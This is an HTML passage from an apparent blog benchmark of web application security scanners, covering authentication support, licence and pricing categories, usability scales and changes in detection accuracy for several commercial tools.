&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqyII7jPXimWQxYQPZQa1Rjd8dFie9ATLMGS-AN3rHjpeTS5B2JD7S-JTTh_-EbCjxZBlSks-fGM-XpaDf4kl956AmVzFyLaUd8dFvj59OPDK5WvTLlQ424qFUn743G3ZdrrYv9N788to/s1600/coverage-feature-count-commercial.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;138&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqyII7jPXimWQxYQPZQa1Rjd8dFie9ATLMGS-AN3rHjpeTS5B2JD7S-JTTh_-EbCjxZBlSks-fGM-XpaDf4kl956AmVzFyLaUd8dFvj59OPDK5WvTLlQ424qFUn743G3ZdrrYv9N788to/s640/coverage-feature-count-commercial.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;
&lt;b style=&quot;text-align: -webkit-auto;&quot;&gt;&lt;u&gt;The Adaptability Score of Web Application Scanners – Free and Open Source Tools&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLfYCF5qfxeEnbTqyoljAmAUCItcD3c6e1lHafQpJVVZlzklVwN2tNnXMczd6s_OQntwIB5FxY6xl3kJXGisZeU3-bgpdXTh2NWVZx5xv8y8IZBO7xLuZzg4f9MdJSzRLIgDUrpvpTrto/s1600/coverage-feature-count-opensource.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;234&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLfYCF5qfxeEnbTqyoljAmAUCItcD3c6e1lHafQpJVVZlzklVwN2tNnXMczd6s_OQntwIB5FxY6xl3kJXGisZeU3-bgpdXTh2NWVZx5xv8y8IZBO7xLuZzg4f9MdJSzRLIgDUrpvpTrto/s640/coverage-feature-count-opensource.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;
&lt;b style=&quot;text-align: -webkit-auto;&quot;&gt;&lt;u&gt;The Adaptability Score of Web Application Scanners – Unified List&lt;/u&gt;&lt;/b&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjunUIy3GkFShH7YJW3IUevzEt3s14Et2MvwqP7EQCUSsrX-p6rqqROKgZNRCLjP9keqD6LdAHbPEPUuc8SLjcfakT3USRPG0AJHAbLmhsmGIEYlctdUJEN4iZAw_0TXsZY7s5wt38HOYg/s1600/coverage-feature-count-unified.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;304&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjunUIy3GkFShH7YJW3IUevzEt3s14Et2MvwqP7EQCUSsrX-p6rqqROKgZNRCLjP9keqD6LdAHbPEPUuc8SLjcfakT3USRPG0AJHAbLmhsmGIEYlctdUJEN4iZAw_0TXsZY7s5wt38HOYg/s640/coverage-feature-count-unified.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both;&quot;&gt;
The detailed comparison of the scanners support for various barriers is documented in detail in the following of sectoolmarket:&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;a href=&quot;http://sectoolmarket.com/coverage-features-comparison-unified-list.html&quot;&gt;http://sectoolmarket.com/coverage-features-comparison-unified-list.html&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraph&quot; style=&quot;margin-left: 18.0pt; mso-add-space: auto; mso-list: l11 level1 lfo7; mso-outline-level: 1; text-indent: -18.0pt;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;14. &lt;/span&gt;&lt;/b&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Test IX – Authentication and
Usability Feature Comparison&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
Although supporting the authentication required by the
application seems like a crucial quality, in reality, certain scanner chaining features
can make-up for the lack of support in certain authentication methods, by
employing the use of a 3rd party proxy to authenticate on the scanner&#39;s behalf.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
For example, if we wanted to use a scanner that does not
support NTLM authentication (but does support an upstream proxy), we could have
defined the relevant credentials in burpsuite FE, and define it as an upstream
proxy for the tested scanner.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
However, chaining the scanner to an external tool that
supports the authentication still has some disadvantages, such as potential
stability issues, thread limitation and inconvenience.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
The following comparison table shows which authentication
methods and features are supported by the various assessed scanners:&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;a href=&quot;http://sectoolmarket.com/authentication-features-comparison-unified-list.html&quot;&gt;http://sectoolmarket.com/authentication-features-comparison-unified-list.html&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraph&quot; style=&quot;margin-left: 18.0pt; mso-add-space: auto; mso-list: l11 level1 lfo7; mso-outline-level: 1; text-indent: -18.0pt;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;15. &lt;/span&gt;&lt;/b&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Test X – The Crown Jewel - Results
&amp;amp; Features vs. Pricing&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
Finally, after reading through all the sections and charts,
and analyzing the different aspects&amp;nbsp; in
which each scanner was measured, it&#39;s time to expose the price (at least for
those of you that did manage to resist the temptation to access this link at
the beginning).&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
The &lt;b&gt;important&lt;/b&gt; thing to notice, specifically in
relation to commercial scanner &lt;b&gt;pricing&lt;/b&gt;, is that each product might be a &lt;b&gt;bundle&lt;/b&gt;
of several &lt;b&gt;semi-independent products&lt;/b&gt; that cover different aspects of the
assessment process, which are not necessarily related to the web application
security. These products currently include web service scanners, flash
application scanners and CGI scanners (SAST and IAST features were not included
on purpose).&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
In short, the scanner price might reflect (or not) a set of
products that might have been priced separately as an independent product. &lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
Another issue to pay attention to is the type of license acquired.
In general, I did not cover &lt;b&gt;non commercial&lt;/b&gt; prices in this comparison,
and in addition, did not include any vendor specific bundles, sales, discounts
and sales pitches. I presented the base prices listed in the vendor website or
provided to me by the vendor, according to a total of 6 predefined categories,
which are in fact, combinations of the following concepts:&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;Consultant Licenses:&lt;/b&gt; although there isn&#39;t a commonly
accepted term, I defined &quot;Consultant&quot; licenses as licenses that fit
the common requirements of a consulting firm - scanning an unrestricted amount
of IP addresses, without any boundaries or limitations.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;Limited Enterprise Licenses:&lt;/b&gt; Any license that allowed
scanning an unlimited but restricted set of addresses (for example - internal
network addresses or organization-specific assets) was defined as an enterprise
license, which might not be suited for a consultant, but will usually suffice
for an organization interested in assessing its own applications.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;Website/Year&lt;/b&gt; - a license to install the software on a
single station and use it for a&amp;nbsp; single
year against a single IP address (the exception to this rule is Netsparker, in
which the per website price reflects 3 Websites).&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;Seat/Year&lt;/b&gt; - a license to install the software on a
single station and use it for a single year.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;Perpetual Licenses&lt;/b&gt; - pay once, and it&#39;s yours (might
still be limited by seat, website, enterprise or consultant restrictions). The
vendor&#39;s website usually includes additional prices for optional support and
product updates.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
The various prices can be viewed in the dedicated comparison
in sectoolmarket, available in the following address:&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;a href=&quot;http://www.sectoolmarket.com/price-and-feature-comparison-of-web-application-scanners-unified-list.html&quot;&gt;http://www.sectoolmarket.com/price-and-feature-comparison-of-web-application-scanners-unified-list.html&lt;/a&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
It is important to remember that this prices might change,
vary or be affected by numerous variables, from special discounts and sales to
a strategic conscious decision of a vendors to invest in you as a customer or a
beta testing site.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraph&quot; style=&quot;margin-left: 18.0pt; mso-add-space: auto; mso-list: l11 level1 lfo7; mso-outline-level: 1; text-indent: -18.0pt;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;16. &lt;/span&gt;&lt;/b&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Additional Comparisons, Built-in
Products and Licenses&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
While in the past I used to present additional information
in external PDF files, with the new presentation platform I am now able to
present the information in a media that is much easier to use and analyze.
Although anyone can access the root URL of sectoolmarket and search the various
sections on his own, I decided to provide a short summary of additional lists
and features that were not covered in a dedicated section of this benchmark,
but were still documented and published in sectoolmarket.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;List of Tools&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
The list of tools tested in this benchmark, and in the
previous benchmarks, can be accessed through the following link:&lt;/div&gt;
&lt;div class=&quot;MsoListParagraph&quot; style=&quot;mso-list: l1 level1 lfo29; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://sectoolmarket.com/list-of-tested-web-application-scanners-unified-list.html&quot;&gt;List
of Tested Scanners and Their Licenses, Notes, Vendor, Source Repository and Latest
Update&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;Additional Features&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
Complementary scan features that were not evaluated or
included in the benchmark:&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpFirst&quot; style=&quot;mso-list: l1 level1 lfo29; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://sectoolmarket.com/complimentary-features-comparison-unified-list.html&quot;&gt;Complementary
Scan Features&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpLast&quot; style=&quot;mso-list: l1 level1 lfo29; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://sectoolmarket.com/general-features-comparison-unified-list.html&quot;&gt;General
Scanner Features&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpLast&quot; style=&quot;mso-list: l1 level1 lfo29; text-indent: -18.0pt;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
In order to clarify what each column in the report table
means, use the following glossary table:&lt;/div&gt;
&lt;table border=&quot;1&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;MsoTableGrid&quot; style=&quot;border-collapse: collapse; border: none; margin-left: 5.4pt; mso-border-alt: solid windowtext .5pt; mso-padding-alt: 0cm 5.4pt 0cm 5.4pt; mso-yfti-tbllook: 1184;&quot;&gt;
 &lt;tbody&gt;
&lt;tr&gt;
  &lt;td style=&quot;background: #C4BC96; border: solid windowtext 1.0pt; mso-background-themecolor: background2; mso-background-themeshade: 191; mso-border-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 106.35pt;&quot; valign=&quot;top&quot; width=&quot;142&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt;&quot;&gt;
&lt;b&gt;&lt;u&gt;Title&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;background: #C4BC96; border-left: none; border: solid windowtext 1.0pt; mso-background-themecolor: background2; mso-background-themeshade: 191; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 240.95pt;&quot; valign=&quot;top&quot; width=&quot;321&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt;&quot;&gt;
&lt;b&gt;&lt;u&gt;Possible Values&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr&gt;
  &lt;td style=&quot;border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 106.35pt;&quot; valign=&quot;top&quot; width=&quot;142&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt;&quot;&gt;
&lt;b&gt;Configuration &amp;amp; Usage Scale&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 240.95pt;&quot; valign=&quot;top&quot; width=&quot;321&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt;&quot;&gt;
&lt;b&gt;Very Simple &lt;/b&gt;- GUI + Wizard&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt;&quot;&gt;
&lt;b&gt;Simple&lt;/b&gt; - GUI with simple options, Command line with scan
  configuration file or simple options&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt;&quot;&gt;
&lt;b&gt;Complex&lt;/b&gt; - GUI with numerous options, Command line with
  multiple options&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt;&quot;&gt;
&lt;b&gt;Very Complex&lt;/b&gt; - Manual scanning feature dependencies, multiple
  configuration requirements&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr&gt;
  &lt;td style=&quot;border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 106.35pt;&quot; valign=&quot;top&quot; width=&quot;142&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt;&quot;&gt;
&lt;b&gt;Stability Scale&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 240.95pt;&quot; valign=&quot;top&quot; width=&quot;321&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt;&quot;&gt;
&lt;b&gt;Very Stable&lt;/b&gt; - Rarely crashes, Never gets stuck&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt;&quot;&gt;
&lt;b&gt;Stable&lt;/b&gt; - Rarely crashes, Gets stuck only in extreme scenarios&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt;&quot;&gt;
&lt;b&gt;Unstable&lt;/b&gt; - Crashes every once in a while, Freezes on a
  consistent basis&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt;&quot;&gt;
&lt;b&gt;Fragile &lt;/b&gt;– Freezes or Crashes on a consistent basis, Fails
  performing the operation in many cases&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr&gt;
  &lt;td style=&quot;border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 106.35pt;&quot; valign=&quot;top&quot; width=&quot;142&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt;&quot;&gt;
&lt;b&gt;Performance Scale&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 240.95pt;&quot; valign=&quot;top&quot; width=&quot;321&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt;&quot;&gt;
&lt;b&gt;Very Fast&lt;/b&gt; - Fast implementation with limited amount of
  scanning tasks&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt;&quot;&gt;
&lt;b&gt;Fast&lt;/b&gt; - Fast implementation with plenty of scanning tasks&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt;&quot;&gt;
&lt;b&gt;Slow&lt;/b&gt; - Slow implementation with limited amount of scanning
  tasks&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt;&quot;&gt;
&lt;b&gt;Very Slow&lt;/b&gt; - Slow implementation with plenty of scanning tasks&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;Scan Logs&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
In order to access the scan logs and detailed scan results of
each scanner, simply access the scan-specific information for that scanner, by
clicking on the scanner &lt;b&gt;version&lt;/b&gt; in the various comparison charts:&lt;/div&gt;
&lt;div class=&quot;MsoListParagraph&quot; style=&quot;mso-list: l1 level1 lfo29; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;a href=&quot;http://sectoolmarket.com/&quot;&gt;http://sectoolmarket.com/&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraph&quot; style=&quot;margin-left: 18.0pt; mso-add-space: auto; mso-list: l11 level1 lfo7; mso-outline-level: 1; text-indent: -18.0pt;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;17. &lt;/span&gt;&lt;/b&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;What Changed?&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
Since the latest benchmark, many open source &amp;amp;
commercial tools added new features and improved their detection accuracy. &lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
The following list presents a summary of changes in the
detection accuracy of &lt;b&gt;commercial &lt;/b&gt;tools that were tested in the previous
benchmark (+new):&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpFirst&quot; style=&quot;mso-list: l27 level1 lfo17; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt;IBM AppScan &lt;/i&gt;&lt;/b&gt;-
no significant changes, new results for Path Traversal and WIVET.&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l27 level1 lfo17; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt;WebInspect&lt;/i&gt;&lt;/b&gt; -
a &lt;b&gt;dramatic improvement&lt;/b&gt; in the detection accuracy of SQLi and XSS
(fantastic result!), new results for Path Traversal, RFI (fantastic result!),
and WIVET (fantastic result!)&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l27 level1 lfo17; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt;Netsparker&lt;/i&gt;&lt;/b&gt; -
no significant changes, new results for Path Traversal&lt;b&gt; &lt;/b&gt;and WIVET.&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l27 level1 lfo17; text-indent: -18.0pt;&quot;&gt;
&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt;Acunetix WVS&lt;/i&gt;&lt;/b&gt; -
a &lt;b&gt;dramatic improvement&lt;/b&gt; in the detection accuracy of SQLi (fantastic
result!) and XSS (fantastic result!), and new results for Path Traversal, RFI
and WIVET.&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l27 level1 lfo17; text-indent: -18.0pt;&quot;&gt;
